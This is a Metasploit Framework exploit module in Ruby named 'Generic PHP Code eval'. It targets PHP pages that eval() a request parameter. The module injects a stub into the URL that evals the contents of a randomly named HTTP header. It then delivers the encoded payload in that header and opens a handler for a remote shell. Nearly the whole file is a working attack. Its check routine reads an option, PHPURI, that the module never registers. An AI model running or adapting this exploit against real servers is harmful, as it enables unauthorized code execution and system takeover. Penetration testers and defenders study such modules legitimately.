##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ManualRanking

	include Msf::Exploit::Remote::HttpClient

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Generic PHP Code eval',
			'Description'    => %q{
				Exploits things like <?php eval($_REQUEST['evalme']); ?>
				It is likely that HTTP evasion options will break this exploit.
			},
			'Author'         => [ 'egypt' ],
			'License'        => BSD_LICENSE,
			'Version'        => '$Revision$',
			'References'     => [ ],
			'Privileged'     => false,
			'Platform'       => ['php'],
			'Arch'           => ARCH_PHP,
			'Payload'        =>
				{
					'Space'       => 4000,
					# max url length for some old versions of apache according to
					# http://www.boutell.com/newfaq/misc/urllength.html
					'DisableNops' => true,
					'BadChars'    => %q|'"`|,  # quotes are escaped by PHP's magic_quotes_gpc in a default install
					'Compat'      =>
						{
							'ConnectionType' => 'find',
						},
					'Keys'        => ['php'],
				},
			'Targets'        => [ ['Automatic', { }], ],
			'DefaultTarget' => 0
			))

		register_options(
			[
				OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
			], self.class)

	end

	def check
		uri = datastore['PHPURI'].gsub(/\?.*/, "")
		print_status("Checking uri #{uri}")
		response = send_request_raw({ 'uri' => uri})
		if response.code == 200
			return Exploit::CheckCode::Detected
		end
		print_error("Server responded with #{response.code}")
		return Exploit::CheckCode::Safe
	end

	def exploit
		# very short timeout because the request may never return if we're
		# sending a socket payload
		timeout = 0.01

		headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
		stub = "eval($_SERVER[HTTP_#{headername.gsub("-", "_")}]);"

		uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
		response = send_request_raw({
				'global' => true,
				'uri' => uri,
				'headers' => {
						headername => payload.encoded,
						'Connection' => 'close'
					}
			},timeout)
		if response and response.code != 200
			print_error("Server returned non-200 status code (#{response.code})")
		end

		handler
	end
end